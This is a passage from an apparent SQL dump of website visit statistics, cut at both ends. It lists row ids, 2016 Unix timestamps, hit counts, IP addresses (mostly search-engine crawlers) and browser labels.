23652,2,0,2,0,'66.249.64.223',''),(34503,1460023706,1,1,0,0,'141.8.132.105','other'),(34504,1460024045,1,1,0,0,'46.200.3.129','chrome'),(34505,1460024216,1,1,0,0,'95.133.238.180','chrome'),(34506,1460024766,1,0,1,0,'68.180.231.29',''),(34507,1460024881,1,1,0,0,'164.132.161.70','other'),(34508,1460025427,2,0,2,0,'66.249.64.228',''),(34509,1460025693,1,1,0,0,'141.8.183.25','other'),(34510,1460025695,3,3,0,0,'51.254.131.242','other'),(34511,1460025887,8,8,0,0,'130.193.50.34','other'),(34512,1460026123,1,1,0,0,'62.210.215.100','chrome'),(34513,1460026342,3,3,0,0,'141.8.132.105','other'),(34514,1460026669,1,1,0,0,'5.255.253.113','other'),(34515,1460026781,3,0,3,0,'66.249.64.233',''),(34516,1460026795,4,4,0,0,'130.193.50.34','other'),(34517,1460027170,1,1,0,0,'141.8.132.52','other'),(34518,1460027174,1,1,0,0,'141.8.142.61','other'),(34519,1460027178,1,1,0,0,'5.255.253.68','other'),(34520,1460027179,1,1,0,0,'91.196.178.40','firefox'),(34521,1460027182,1,1,0,0,'130.193.37.7','other'),(34522,1460027295,1,1,0,0,'130.193.50.4','other'),(34523,1460027401,2,1,1,0,'66.249.64.228',''),(34524,1460027545,1,1,0,0,'217.69.133.236','other'),(34525,1460027546,1,1,0,0,'217.69.133.237','other'),(34526,1460027638,1,1,0,0,'66.249.64.162','other'),(34527,1460027670,1,1,0,0,'141.8.183.25','other'),(34528,1460027916,1,1,0,0,'94.179.105.90','firefox'),(34529,1460027987,1,1,0,0,'66.249.64.150','other'),(34530,1460028037,1,1,0,0,'157.55.39.101','other'),(34531,1460028431,1,1,0,0,'66.249.89.118','other'),(34532,1460028476,1,1,0,0,'178.255.215.95','other'),(34533,1460028530,1,0,1,0,'66.249.64.228',''),(34534,1460028878,1,0,1,0,'66.249.64.223',''),(34535,1460029047,1,0,1,0,'66.249.64.233',''),(34536,1460029534,1,0,1,0,'66.249.78.58',''),(34537,1460029542,1,1,0,0,'66.102.9.68','chrome'),(34538,1460029558,1,1,0,0,'217.69.133.6','other'),(34539,1460029583,1,1,0,0,'130.193.50.34','other'),(34540,1460029759,2,0,2,0,'66.249.66.190',''),(34541,1460029958,1,1,0,0,'217.69.133.232','other'),(34542,1460030080,1,1,0,0,'91.196.178.39','chrome'),(34543,1460030198,2,0,2,0,'68.180.231.29',''),(34544,1460030444,1,1,0,0,'92.113.216.128','chrome'),(34545,1460030542,1,1,0,0,'217.69.133.218','other'),(34546,1460030750,1,1,0,0,'91.196.178.69','chrome'),(34547,1460030863,1,0,1,0,'66.249.78.99',''),(34548,1460031042,1,1,0,0,'91.196.178.67','chrome'),(34549,1460031043,1,0,1,0,'66.249.78.65',''),(34550,1460031135,1,0,1,0,'66.249.78.58',''),(34551,1460031145,1,1,0,0,'8.29.198.25','other'),(34552,1460031398,1,1,0,0,'94.178.7.211','chrome'),(34553,1460031402,2,0,2,0,'66.249.78.51',''),(34554,1460031471,1,1,0,0,'217.69.133.14','other'),(34555,1460031473,1,1,0,0,'82.145.223.56','opera'),(34556,1460031790,1,1,0,0,'94.179.105.90','firefox'),(34557,1460031814,1,1,0,0,'217.69.133.221','other'),(34558,1460032179,1,1,0,0,'141.8.132.105','other'),(34559,1460032270,4,0,4,0,'66.249.78.58',''),(34560,1460032390,1,1,0,0,'130.193.50.34','other'),(34561,1460032543,6,0,6,0,'66.249.78.51',''),(34562,1460032903,2,0,2,0,'68.180.231.29',''),(34563,1460033179,1,1,0,0,'217.69.133.240','other'),(34564,1460033191,1,1,0,0,'130.193.51.83','other'),(34565,1460033238,4,1,3,0,'66.249.78.58',''),(34566,1460033499,1,1,0,0,'217.69.133.231','other'),(34567,1460033630,2,0,2,0,'66.249.78.51',''),(34568,1460034201,2,1,1,0,'66.249.78.58',''),(34569,1460034286,1,1,0,0,'217.69.133.219','other'),(34570,1460034287,1,1,0,0,'217.69.133.85','other'),(34571,1460034693,1,0,1,0,'66.249.78.51',''),(34572,1460034700,5,1,4,0,'66.249.78.51',''),(34573,1460034783,1,1,0,0,'77.88.208.13','chrome'),(34574,1460035016,1,1,0,0,'178.154.189.202','other'),(34575,1460035207,2,2,0,0,'66.249.78.65','other'),(34576,1460035335,1,0,1,0,'66.249.78.106',''),(34577,1460035718,2,0,2,0,'68.180.231.29',''),(34578,1460035762,1,1,0,0,'37.55.210.65','chrome'),(34579,1460035841,4,0,4,0,'66.249.78.58',''),(34580,1460035862,1,1,0,0,'94.178.7.211','chrome'),(34581,1460036178,1,0,1,0,'66.249.78.65',''),(34582,1460036431,1,1,0,0,'51.255.65.38','other'),(34583,1460036494,1,1,0,0,'217.69.133.2','other'),(34584,1460036521,11,0,11,0,'66.249.78.51',''),(34585,1460036593,1,0,1,0,'66.249.66.190',''),(34586,1460036705,4,1,3,0,'66.249.78.51',''),(34587,1460036891,3,3,0,0,'178.154.189.202','other'),(34588,1460036970,1,1,0,0,'164.132.161.91','other'),(34589,1460037219,1,1,0,0,'217.69.133.221','other'),(34590,1460037261,4,4,0,0,'91.121.101.78','other'),(34591,1460037350,1,1,0,0,'130.193.50.34','other'),(34592,1460037478,1,1,0,0,'130.193.51.83','other'),(34593,1460037532,1,1,0,0,'217.69.133.234','other'),(34594,1460037533,1,1,0,0,'217.69.133.238','other'),(34595,1460037539,1,1,0,0,'66.249.78.58','other'),(34596,1460037607,1,1,0,0,'217.69.133.222','other'),(34597,1460037767,1,1,0,0,'164.132.161.90','other'),(34598,1460037768,1,1,0,0,'66.249.78.65','other'),(34599,1460037889,1,1,0,0,'164.132.161.76','other'),(34600,1460038269,10,0,10,0,'66.249.78.51',''),(34601,1460038412,2,1,1,0,'66.249.78.99',''),(34602,1460038467,1,1,0,0,'66.249.78.113','other'),(34603,1460038548,1,1,0,0,'66.249.78.58','other'),(34604,1460038614,1,1,0,0,'95.221.226.71','msie'),(34605,1460038615,1,1,0,0,'95.25.62.107','msie'),(34606,1460038616,1,1,0,0,'176.77.25.207','msie'),(34608,1460038617,1,1,0,0,'217.69.133.234','other'),(34609,1460038621,1,1,0,0,'176.195.100.245','msie'),(34610,1460038627,1,1,0,0,'37.145.13.124','msie'),(34611,1460038696,1,1,0,0,'157.55.39.130','other'),(34612,1460038879,1,0,1,0,'66.249.66.150',''),(34613,1460038943,2,2,0,0,'217.69.133.221','other'),(34615,1460038966,4,0,4,0,'66.249.66.190',''),(34616,1460039129,1,1,0,0,'91.196.177.69','chrome'),(34617,1460039160,1,1,0,0,'178.154.189.202','other'),(34618,1460039245,2,2,0,0,'95.213.141.126','opera'),(34619,1460039252,1,1,0,0,'66.249.92.68','other'),(34620,1460039384,1,1,0,0,'217.69.133.226','other'),(34621,1460039664,1,0,1,0,'68.180.231.29',''),(34622,1460039828,1,1,0,0,'66.249.78.58','other'),(34623,1460039913,169,169,0,0,'144.76.7.107','other'),(34624,1460040266,1,1,0,0,'130.193.50.34','other'),(34625,1460040292,3,0,3,0,'66.249.78.51',''),(34626,1460040344,2,2,0,0,'85.178.75.174','other'),(34627,1460040471,1,1,0,0,'217.69.133.216','other'),(34628,1460040472,1,1,0,0,'217.69.133.217','other'),(34629,1460040911,1,1,0,0,'217.69.133.238','other'),(34630,1460040974,1,1,0,0,'51.255.65.11','other'),(34631,1460041004,1,1,0,0,'180.76.15.26','other'),(34632,1460041052,1,1,0,0,'217.69.133.2','other'),(34633,1460041310,1,1,0,0,'217.69.133.219','other'),(34634,1460041623,3,0,3,0,'66.249.78.65',''),(34635,1460041701,1,1,0,0,'94.179.6.215','firefox'),(34636,1460041757,1,0,1,0,'66.249.78.58',''),(34637,1460041961,1,1,0,0,'8.29.198.25','other'),(34638,1460042006,2,0,2,0,'66.249.78.51',''),(34639,1460042715,3,1,2,0,'66.249.78.58',''),(34640,1460042742,1,1,0,0,'31.184.238.121','chrome'),(34641,1460042752,1,1,0,0,'217.69.133.231','other'),(34642,1460042769,6,1,5,0,'66.249.78.51',''),(34643,1460042787,1,0,1,0,'66.249.66.128',''),(34645,1460042923,1,1,0,0,'91.196.178.68','firefox'),(34646,1460043018,1,0,1,0,'66.249.78.65',''),(34647,1460043194,3,2,1,0,'66.249.78.51',''),(34648,1460043251,9,8,1,0,'66.249.78.51',''),(34649,1460043327,1,1,0,0,'51.255.65.25','other'),(34650,1460043536,1,1,0,0,'151.80.31.184','other'),(34651,1460043552,1,1,0,0,'217.69.133.227','other'),(34652,1460043572,1,1,0,0,'62.210.215.100','chrome'),(34653,1460043674,13,12,1,0,'66.249.78.51',''),(34654,1460043835,1,1,0,0,'195.162.90.59','chrome'),(34655,1460043992,1,0,1,0,'68.180.231.29',''),(34656,1460044097,1,1,0,0,'66.249.66.190','other'),(34657,1460044381,3,2,1,0,'66.249.78.51',''),(34658,1460044400,1,1,0,0,'31.184.238.235','chrome'),(34659,1460044484,1,1,0,0,'141.8.183.25','other'),(34660,1460044528,9,1,8,0,'66.249.78.51',''),(34661,1460044676,1,0,1,0,'66.249.78.99',''),(34662,1460044827,10,8,2,0,'66.249.78.51',''),(34663,1460044864,2,1,1,0,'66.249.78.99',''),(34664,1460045025,1,1,0,0,'217.69.133.223','other'),(34665,1460045026,1,1,0,0,'217.69.133.224','other'),(34666,1460045082,1,1,0,0,'122.96.59.107','firefox'),(34667,1460045094,4,4,0,0,'66.249.78.58','other'),(34668,1460045158,1,1,0,0,'66.249.78.113','other'),(34669,1460045430,8,7,1,0,'66.249.78.51',''),(34670,1460045667,1,1,0,0,'93.158.152.61','other'),(34671,1460045671,1,1,0,0,'130.193.51.19','other'),(34672,1460045700,1,1,0,0,'141.8.183.25','other'),(34673,1460045732,13,13,0,0,'130.193.50.34','other'),(34674,1460045764,1,1,0,0,'141.8.142.25','other'),(34675,1460045795,1,1,0,0,'130.193.51.83','other'),(34676,1460045869,1,1,0,0,'157.55.39.101','other'),(34677,1460045997,4,4,0,0,'66.249.78.58','other'),(34678,1460046038,9,9,0,0,'141.8.132.105','other'),(34679,1460046262,2,1,1,0,'66.249.78.51',''),(34680,1460046269,1,1,0,0,'217.69.133.215','other'),(34681,1460046272,4,1,3,0,'66.249.78.51',''),(34682,1460046371,1,1,0,0,'5.255.253.113','other'),(34683,1460046482,17,17,0,0,'66.249.78.51','other'),(34684,1460046624,3,3,0,0,'141.8.183.25','other'),(34685,1460046759,15,15,0,0,'130.193.50.34','other'),(34686,1460046761,1,1,0,0,'207.46.13.133','other'),(34687,1460046936,2,0,2,0,'66.249.78.113',''),(34688,1460047147,1,1,0,0,'217.69.133.223','other'),(34689,1460047148,1,1,0,0,'217.69.133.224','other'),(34690,1460047150,1,1,0,0,'217.69.133.220','other'),(34691,1460047196,2,2,0,0,'141.8.132.105','other'),(34692,1460047204,1,1,0,0,'66.249.78.65','other'),(34693,1460047219,1,1,0,0,'66.249.78.58','other'),(34694,1460047337,1,1,0,0,'217.69.133.216','other'),(34695,1460047369,3,2,1,0,'66.249.66.190',''),(34696,1460047441,9,8,1,0,'66.249.78.51',''),(34698,1460047573,1,1,0,0,'130.193.51.83','other'),(34699,1460047960,2,2,0,0,'66.249.66.128','other'),(34700,1460048138,9,9,0,0,'66.249.78.51','other'),(34701,1460048167,1,1,0,0,'141.8.183.25','other'),(34702,1460048237,1,1,0,0,'130.193.50.34','other'),(34703,1460048276,1,1,0,0,'217.69.133.228','other'),(34704,1460048277,1,1,0,0,'217.69.133.69','other'),(34705,1460048443,1,0,1,0,'66.249.78.106',''),(34706,1460048507,4,4,0,0,'66.249.66.190','other'),(34707,1460048595,1,0,1,0,'68.180.231.29',''),(34708,1460049234,3,0,3,0,'66.249.78.51',''),(34709,1460049345,3,0,3,0,'66.249.78.65',''),(34710,1460049581,1,1,0,0,'66.249.92.125','other'),(34711,1460049601,1,0,1,0,'66.249.78.58',''),(34712,1460049716,1,1,0,0,'141.8.132.105','other'),(34713,1460050098,1,1,0,0,'217.69.133.224','other'),(34714,1460050100,1,1,0,0,'217.69.133.68','other'),(34715,1460050167,1,0,1,0,'66.249.66.132',''),(34716,1460050174,4,0,4,0,'66.249.78.51',''),(34717,1460050196,1,0,1,0,'66.249.66.190',''),(34718,1460050262,2,2,0,0,'40.77.167.77','other'),(34719,1460050283,1,1,0,0,'37.115.86.15','chrome'),(34720,1460050803,1,1,0,0,'66.249.78.106','other'),(34721,1460050851,1,1,0,0,'217.69.133.218','other'),(34722,1460050873,2,0,2,0,'66.249.78.65',''),(34723,1460051696,7,0,7,0,'66.249.78.51',''),(34724,1460051715,1,0,1,0,'66.249.66.132',''),(34725,1460051720,1,0,1,0,'66.249.78.58',''),(34726,1460051855,1,1,0,0,'217.69.133.220','other'),(34727,1460052143,1,1,0,0,'66.102.9.57','chrome'),(34728,1460052263,1,1,0,0,'217.69.133.217','other'),(34730,1460052292,1,1,0,0,'130.193.50.34','other'),(34731,1460052378,1,1,0,0,'51.255.65.13','other'),(34732,1460052467,2,2,0,0,'217.69.136.210','other'),(34733,1460052470,1,1,0,0,'217.69.136.208','other'),(34734,1460052483,1,1,0,0,'82.145.217.188','opera'),(34735,1460052597,1,1,0,0,'66.249.78.99','other'),(34736,1460052791,1,1,0,0,'164.132.161.9','other'),(34737,1460052848,1,1,0,0,'8.29.198.26','other'),(34738,1460053001,2,0,2,0,'66.249.78.58',''),(34739,1460053042,2,0,2,0,'66.249.78.65',''),(34740,1460053161,6,0,6,0,'66.249.78.51',''),(34741,1460053278,1,1,0,0,'217.69.133.233','other'),(34742,1460053996,1,1,0,0,'91.196.178.134','chrome'),(34743,1460054087,1,1,0,0,'217.69.133.70','other'),(34744,1460054286,1,1,0,0,'82.145.217.188','opera'),(34745,1460054411,1,0,1,0,'66.249.78.99',''),(34746,1460054553,1,1,0,0,'217.69.133.12','other'),(34747,1460054632,2,2,0,0,'217.69.133.232','other'),(34748,1460054633,1,1,0,0,'217.69.133.69','other'),(34749,1460054920,1,1,0,0,'217.69.133.194','other'),(34750,1460055299,1,1,0,0,'217.69.133.237','other'),(34751,1460055406,1,0,1,0,'66.249.78.106',''),(34752,1460055412,1,0,1,0,'66.249.78.99',''),(34753,1460055463,2,0,2,0,'66.249.78.65',''),(34754,1460055531,1,1,0,0,'141.8.183.25','other'),(34755,1460055570,1,1,0,0,'62.210.215.100','chrome'),(34756,1460055578,2,0,2,0,'66.249.78.51',''),(34757,1460055744,1,1,0,0,'217.69.133.230','other'),(34758,1460055914,1,1,0,0,'66.249.78.58','other'),(34759,1460056232,1,1,0,0,'91.196.178.34','chrome'),(34760,1460056626,1,0,1,0,'66.249.78.65',''),(34761,1460056976,1,1,0,0,'51.255.65.39','other'),(34762,1460057007,1,1,0,0,'217.69.133.219','other'),(34763,1460057076,1,1,0,0,'164.132.161.46','other'),(34764,1460057322,1,1,0,0,'217.69.133.68','other'),(34765,1460057497,1,1,0,0,'217.69.133.4','other'),(34766,1460057507,1,1,0,0,'40.77.167.77','other'),(34767,1460057651,3,3,0,0,'130.193.50.34','other'),(34768,1460057916,3,3,0,0,'141.8.132.105','other'),(34769,1460057932,1,0,1,0,'68.180.231.29',''),(34770,1460057936,199,199,0,0,'109.149.177.164','other'),(34771,1460058011,1,1,0,0,'5.255.253.113','other'),(34772,1460058015,1,1,0,0,'130.193.51.83','other'),(34773,1460058478,1,1,0,0,'217.69.133.220','other'),(34774,1460058479,1,1,0,0,'217.69.133.222','other'),(34775,1460058509,1,1,0,0,'217.69.133.217','other'),(34776,1460058526,1,1,0,0,'82.145.208.36','opera'),(34777,1460058715,4,4,0,0,'130.193.50.34','other'),(34778,1460058819,1,1,0,0,'91.196.178.161','chrome'),(34779,1460058911,1,1,0,0,'217.69.136.206','other'),(34780,1460058913,1,1,0,0,'185.26.182.31','opera'),(34781,1460058914,1,1,0,0,'217.69.136.208','other'),(34782,1460059603,1,1,0,0,'207.46.13.133','other'),(34783,1460059655,1,1,0,0,'217.69.133.227','other'),(34784,1460059758,2,2,0,0,'130.193.50.34','other'),(34785,1460059762,1,1,0,0,'141.8.183.25','other'),(34786,1460059819,1,1,0,0,'217.69.133.234','other'),(34787,1460060021,1,1,0,0,'217.69.133.68','other'),(34788,1460060247,1,0,1,0,'66.249.66.128',''),(34789,1460060259,1,1,0,0,'66.249.78.51','other'),(34790,1460060298,1,1,0,0,'217.69.133.231','other'),(34791,1460060324,1,1,0,0,'164.132.161.15','other'),(34792,1460060384,1,1,0,0,'77.247.181.165','chrome'),(34793,1460060861,1,1,0,0,'66.249.92.125','other'),(34794,1460060979,1,1,0,0,'217.69.133.203','other'),(34795,1460061025,1,1,0,0,'217.69.133.220','other'),(34796,1460061066,1,1,0,0,'141.8.132.41','other'),(34797,1460062223,178,178,0,0,'69.30.198.202','other'),(34798,1460062623,1,1,0,0,'217.69.136.204','other'),(34799,1460062893,1,0,1,0,'68.180.231.29',''),(34800,1460063233,1,1,0,0,'130.193.50.34','other'),(34801,1460063384,1,1,0,0,'93.158.152.203','other'),(34802,1460063432,1,1,0,0,'217.69.133.14','other'),(34803,1460063531,1,1,0,0,'217.69.133.232','other'),(34804,1460063687,1,1,0,0,'8.29.198.26','other'),(34805,1460063891,1,1,0,0,'217.69.133.227','other'),(34806,1460063935,1,1,0,0,'217.69.133.4','other'),(34807,1460064136,1,1,0,0,'217.69.133.70','other'),(34808,1460064296,1,1,0,0,'66.249.78.113','other'),(34809,1460064328,1,0,1,0,'66.249.78.65',''),(34810,1460064752,1,1,0,0,'180.76.15.28','other'),(34811,1460064841,1,1,0,0,'217.69.136.205','other'),(34812,1460065374,1,0,1,0,'66.249.78.51',''),(34813,1460066016,1,0,1,0,'66.249.78.65',''),(34814,1460066067,1,1,0,0,'217.69.133.15','other'),(34815,1460066086,1,1,0,0,'151.80.31.100','other'),(34816,1460066137,1,1,0,0,'217.69.136.208','other'),(34817,1460066139,1,1,0,0,'217.69.136.204','other'),(34819,1460066666,2,2,0,0,'130.193.50.34','other'),(34820,1460066675,1,1,0,0,'141.8.132.105','other'),(34821,1460066819,1,0,1,0,'66.249.78.106',''),(34822,1460067003,1,1,0,0,'164.132.161.58','other'),(34823,1460067220,1,0,1,0,'66.249.78.65',''),(34824,1460067623,1,0,1,0,'66.249.66.132',''),(34825,1460067809,14,14,0,0,'130.193.50.34','other'),(34826,1460067866,3,3,0,0,'141.8.132.105','other'),(34827,1460067914,7,7,0,0,'141.8.183.25','other'),(34828,1460067971,3,3,0,0,'5.255.253.113','other'),(34829,1460068259,1,1,0,0,'66.249.78.65','other'),(34830,1460068531,1,0,1,0,'68.180.231.29',''),(34831,1460068618,1,1,0,0,'217.69.133.232','other'),(34832,1460068619,1,1,0,0,'217.69.133.231','other'),(34833,1460068946,8,8,0,0,'130.193.50.34','other'),(34834,1460069066,1,1,0,0,'141.8.183.25','other'),(34835,1460069074,1,1,0,0,'141.8.132.105','other'),(34836,1460069398,2,0,2,0,'66.249.78.58',''),(34837,1460069941,4,4,0,0,'130.193.50.34','other'),(34838,1460070045,1,0,1,0,'66.249.78.65',''),(34839,1460070047,1,0,1,0,'66.249.78.51',''),(34840,1460070192,1,1,0,0,'93.158.152.51','other'),(34841,1460070326,2,2,0,0,'217.69.136.209','other'),(34842,1460070327,1,1,0,0,'217.69.136.203','other'),(34843,1460070842,1,1,0,0,'217.69.133.15','other'),(34844,1460071167,3,3,0,0,'188.40.95.70','other'),(34845,1460071353,1,1,0,0,'217.69.133.14','other'),(34846,1460071702,1,1,0,0,'217.69.133.239','other'),(34847,1460071823,2,1,1,0,'66.249.78.65',''),(34848,1460071914,53,53,0,0,'62.210.107.201','other'),(34849,1460071967,7,7,0,0,'130.193.50.34','other'),(34850,1460071979,1,1,0,0,'66.249.92.68','other'),(34851,1460072001,1,1,0,0,'130.193.51.83','other'),(34852,1460072009,2,0,2,0,'66.249.78.51',''),(34853,1460072400,1,1,0,0,'51.255.65.23','other'),(34854,1460072911,1,0,1,0,'66.249.78.99',''),(34855,1460073111,1,1,0,0,'180.76.15.135','other'),(34856,1460073245,2,2,0,0,'217.69.133.227','other'),(34857,1460073399,1,1,0,0,'164.132.161.67','other'),(34858,1460073430,1,1,0,0,'151.80.31.100','other'),(34859,1460073455,1,1,0,0,'164.132.161.93','other'),(34860,1460073554,2,0,2,0,'66.249.78.65',''),(34861,1460073622,3,0,3,0,'66.249.78.51',''),(34862,1460074011,1,1,0,0,'217.69.133.237','other'),(34863,1460074112,3,0,3,0,'66.249.78.58',''),(34864,1460074522,1,1,0,0,'8.29.198.25','other'),(34865,1460074942,4,1,3,0,'66.249.78.51',''),(34866,1460075091,3,0,3,0,'66.249.78.58',''),(34867,1460075209,1,0,1,0,'66.249.78.65',''),(34868,1460075270,2,2,0,0,'66.249.78.65','other'),(34869,1460075664,1,0,1,0,'66.249.66.190',''),(34870,1460075988,1,1,0,0,'217.69.133.69','other'),(34871,1460076091,1,1,0,0,'62.210.215.100','chrome'),(34872,1460076250,1,1,0,0,'51.255.65.85','other'),(34873,1460076402,1,0,1,0,'68.180.231.29',''),(34874,1460076600,1,0,1,0,'66.249.78.58',''),(34875,1460076607,1,1,0,0,'217.69.133.9','other'),(34876,1460076609,1,1,0,0,'217.69.133.203','other'),(34877,1460076709,2,1,1,0,'66.249.78.58',''),(34878,1460077342,1,0,1,0,'66.249.78.65',''),(34879,1460077404,1,0,1,0,'66.249.78.51',''),(34880,1460077419,1,1,0,0,'164.132.161.58','other'),(34881,1460077620,1,1,0,0,'217.69.133.11','other'),(34882,1460077621,1,1,0,0,'217.69.133.10','other'),(34883,1460077644,1,1,0,0,'217.69.133.238','other'),(34884,1460077679,1,1,0,0,'217.69.133.231','other'),(34885,1460077894,2,0,2,0,'68.180.231.29',''),(34886,1460077968,1,1,0,0,'69.30.205.218','other'),(34887,1460078099,3,1,2,0,'66.249.78.58',''),(34888,1460078136,1,1,0,0,'66.249.66.190','other'),(34889,1460078510,2,0,2,0,'66.249.78.65',''),(34890,1460079119,2,0,2,0,'66.249.78.51',''),(34891,1460079430,1,1,0,0,'141.8.183.25','other'),(34892,1460079753,1,1,0,0,'217.69.133.221','other'),(34893,1460079774,2,0,2,0,'66.249.78.65',''),(34894,1460079824,1,1,0,0,'217.69.133.236','other'),(34895,1460080133,1,1,0,0,'141.8.142.61','other'),(34896,1460080152,1,1,0,0,'207.46.13.129','other'),(34897,1460080312,1,1,0,0,'130.193.50.34','other'),(34898,1460080340,2,0,2,0,'66.249.78.51',''),(34899,1460080439,1,0,1,0,'66.249.78.99',''),(34900,1460080441,1,1,0,0,'5.255.253.113','other'),(34901,1460080525,1,1,0,0,'217.69.133.230','other'),(34902,1460080561,1,1,0,0,'217.69.133.216','other'),(34903,1460080638,4,4,0,0,'51.255.48.153','other'),(34904,1460081183,1,1,0,0,'164.132.161.71','other'),(34905,1460081231,1,1,0,0,'62.210.215.100','chrome'),(34906,1460081526,1,1,0,0,'66.249.78.65','other'),(34907,1460081613,1,0,1,0,'66.249.78.51',''),(34908,1460081636,1,1,0,0,'217.69.133.230','other'),(34909,1460081689,1,1,0,0,'217.69.133.235','other'),(34910,1460081926,1,1,0,0,'217.69.133.233','other'),(34911,1460082096,3,0,3,0,'66.249.78.58',''),(34912,1460082201,1,1,0,0,'51.255.65.97','other'),(34913,1460082860,1,0,1,0,'68.180.231.29',''),(34914,1460082872,2,2,0,0,'217.69.133.193','other'),(34915,1460083033,1,0,1,0,'66.249.78.58',''),(34916,1460083035,1,1,0,0,'40.77.167.13','other'),(34917,1460083060,1,0,1,0,'66.249.78.51',''),(34918,1460083099,1,0,1,0,'66.249.78.106',''),(34919,1460083171,1,1,0,0,'66.249.92.68','other'),(34920,1460083413,2,0,2,0,'66.249.78.113',''),(34921,1460084000,1,1,0,0,'217.69.133.217','other'),(34922,1460084078,2,0,2,0,'66.249.78.58',''),(34923,1460084515,1,1,0,0,'95.221.244.106','chrome'),(34924,1460084516,1,1,0,0,'176.195.97.5','opera'),(34925,1460084518,1,1,0,0,'188.32.244.196','chrome'),(34926,1460084520,1,1,0,0,'37.204.39.230','chrome'),(34927,1460084522,1,1,0,0,'95.221.195.125','firefox'),(34928,1460084657,1,1,0,0,'217.69.133.221','other'),(34929,1460085147,1,0,1,0,'66.249.78.58',''),(34930,1460085165,1,1,0,0,'207.46.13.129','other'),(34931,1460085423,1,1,0,0,'8.29.198.25','other'),(34932,1460085513,1,1,0,0,'217.69.133.229','other'),(34933,1460085525,1,1,0,0,'164.132.161.39','other'),(34934,1460085718,2,0,2,0,'66.249.78.65',''),(34935,1460085749,1,1,0,0,'178.154.189.202','other'),(34936,1460085801,2,0,2,0,'66.249.78.51',''),(34937,1460085958,1,1,0,0,'141.8.183.25','other'),(34938,1460085965,1,0,1,0,'68.180.231.29',''),(34939,1460086253,3,0,3,0,'66.249.78.58',''),(34940,1460086442,1,1,0,0,'180.76.15.152','other'),(34941,1460086474,1,1,0,0,'178.154.189.203','other'),(34942,1460086990,1,1,0,0,'164.132.161.53','other'),(34943,1460087068,1,1,0,0,'130.193.51.74','other'),(34944,1460087072,1,1,0,0,'5.255.253.26','other'),(34945,1460087077,1,1,0,0,'141.8.132.105','other'),(34946,1460087157,1,0,1,0,'68.180.231.29',''),(34947,1460087248,1,1,0,0,'178.154.189.201','other'),(34948,1460087270,1,1,0,0,'93.158.152.201','other'),(34949,1460087291,1,1,0,0,'178.154.189.202','other'),(34950,1460087294,2,0,2,0,'66.249.78.65',''),(34951,1460087314,2,0,2,0,'66.249.78.51',''),(34952,1460087338,1,0,1,0,'66.249.66.190',''),(34953,1460087417,1,1,0,0,'217.69.133.237','other'),(34954,1460087492,2,0,2,0,'66.249.78.58',''),(34955,1460087626,1,1,0,0,'217.69.133.225','other'),(34956,1460087946,1,1,0,0,'217.69.133.223','other'),(34957,1460088239,1,1,0,0,'180.76.15.163','other'),(34958,1460088360,1,1,0,0,'66.249.78.51','other'),(34959,1460088460,1,1,0,0,'164.132.161.55','other'),(34960,1460088729,1,0,1,0,'66.249.78.58',''),(34961,1460089096,4,4,0,0,'69.30.211.2','other'),(34962,1460089175,1,0,1,0,'68.180.231.29',''),(34963,1460089249,1,0,1,0,'66.249.66.132',''),(34964,1460089269,1,1,0,0,'164.132.161.74','other'),(34965,1460089318,1,1,0,0,'217.69.133.236','other'),(34966,1460089512,2,0,2,0,'66.249.78.65',''),(34967,1460089861,1,1,0,0,'164.132.161.25','other'),(34968,1460089923,1,0,1,0,'66.249.78.58',''),(34969,1460090473,1,1,0,0,'217.69.133.217','other'),(34970,1460090821,3,0,3,0,'66.249.78.51',''),(34971,1460091007,1,1,0,0,'217.69.133.224','other'),(34972,1460091014,1,0,1,0,'66.249.78.58',''),(34974,1460092016,1,1,0,0,'217.69.136.210','other'),(34975,1460092085,1,1,0,0,'91.196.178.70','chrome'),(34976,1460092242,3,0,3,0,'66.249.78.51',''),(34977,1460092413,3,0,3,0,'66.249.78.65',''),(34978,1460092587,4,0,4,0,'66.249.78.58',''),(34979,1460092799,1,0,1,0,'66.249.78.99',''),(34980,1460093017,1,1,0,0,'217.69.133.239','other'),(34981,1460093018,1,1,0,0,'217.69.133.70','other'),(34982,1460093089,1,1,0,0,'217.69.133.11','other'),(34983,1460093542,1,1,0,0,'178.92.247.171','chrome'),(34984,1460093640,1,1,0,0,'93.158.152.46','other'),(34985,1460093644,1,1,0,0,'141.8.142.58','other'),(34986,1460093769,1,0,1,0,'68.180.231.29',''),(34987,1460093777,1,0,1,0,'66.249.78.65',''),(34988,1460093837,1,1,0,0,'217.69.133.3','other'),(34989,1460093968,1,1,0,0,'66.249.78.106','other'),(34990,1460094071,1,1,0,0,'66.249.92.125','other'),(34991,1460094172,1,1,0,0,'66.249.66.132','other'),(34992,1460094424,2,0,2,0,'66.249.78.58',''),(34993,1460094558,1,0,1,0,'66.249.66.190',''),(34994,1460094577,2,0,2,0,'66.249.78.51',''),(34995,1460094618,1,1,0,0,'130.193.50.34','other'),(34996,1460094858,2,2,0,0,'91.196.178.67','firefox'),(34997,1460096064,4,4,0,0,'91.196.178.67','firefox'),(34998,1460096262,1,1,0,0,'104.45.18.178','other'),(34999,1460096270,1,1,0,0,'40.78.146.128','other'),(35000,1460096271,1,1,0,0,'37.53.228.217','firefox'),(35001,1460096317,1,1,0,0,'91.196.178.68','chrome'),(35003,1460096346,1,1,0,0,'91.196.178.71','chrome'),(35004,1460096351,1,1,0,0,'91.196.178.71','firefox'),(35005,1460096366,1,1,0,0,'91.196.178.67','chrome'),(35006,1460096463,1,1,0,0,'69.171.230.123','other'),(35007,1460096528,1,1,0,0,'91.196.178.66','firefox'),(35008,1460096537,1,1,0,0,'173.252.79.114','other'),(35009,1460096538,1,1,0,0,'173.252.105.113','other'),(35010,1460096539,1,1,0,0,'173.252.79.119','other'),(35011,1460096857,1,1,0,0,'173.252.115.90','other'),(35012,1460096969,2,2,0,0,'91.196.178.67','firefox'),(35013,1460097933,1,1,0,0,'91.196.178.67','firefox'),(35014,1460098213,1,1,0,0,'91.196.178.40','firefox'),(35015,1460098447,1,1,0,0,'37.73.213.28','chrome'),(35016,1460099288,1,1,0,0,'91.196.178.67','firefox'),(35017,1460099552,1,1,0,0,'207.46.13.133','other'),(35018,1460099751,1,1,0,0,'40.77.167.13','other'),(35019,1460100496,21,21,0,0,'207.46.13.129','other'),(35020,1460100517,55,55,0,0,'207.46.13.133','other'),(35021,1460101315,1,1,0,0,'91.196.178.67','firefox'),(35022,1460101730,1,1,0,0,'193.19.152.14','other'),(35023,1460102001,48,48,0,0,'157.55.39.36','other'),(35024,1460103568,1,0,1,0,'68.180.229.171',''),(35025,1460103834,1,1,0,0,'91.196.178.67','firefox'),(35026,1460104233,1,1,0,0,'91.196.178.66','chrome'),(35027,1460105383,1,1,0,0,'94.179.43.35','chrome'),(35028,1460105424,1,